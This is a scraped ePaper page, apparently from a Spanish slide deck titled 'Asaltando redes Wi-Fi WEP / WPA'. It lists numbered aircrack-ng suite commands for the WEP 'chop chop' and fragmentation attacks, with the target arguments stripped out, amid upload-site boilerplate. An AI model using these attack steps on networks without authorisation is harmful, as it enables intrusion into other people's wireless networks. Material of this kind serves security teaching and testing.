12.07.2015 Views

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

Ataque chop chop:1) # ifconfig down2) # airmon-ng start 3) # airodump-ng 4) # airodump-ng -w --bssid -c 5) # aireplay-ng -1 10 -e -a -h 6) # aireplay-ng -4 -b -h 7) # tcpdump -s 0 -n -e -r 8) # packetforge-ng -0 -a -h -k -l -y -w 9) # aireplay-ng -2 -h -r 10) # aircrack-ng Ataque de fragmentación:1) # ifconfig down2) # airmon-ng start 3) # airodump-ng 4) # airodump-ng -w --bssid -c 5) # aireplay-ng -1 10 -e -a -h 6) # aireplay-ng -5 -b -h 7) # packetforge-ng -0 -a -h -k -l -y -w 8) # aireplay-ng -2 -h -r 9) # aircrack-ng 12

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!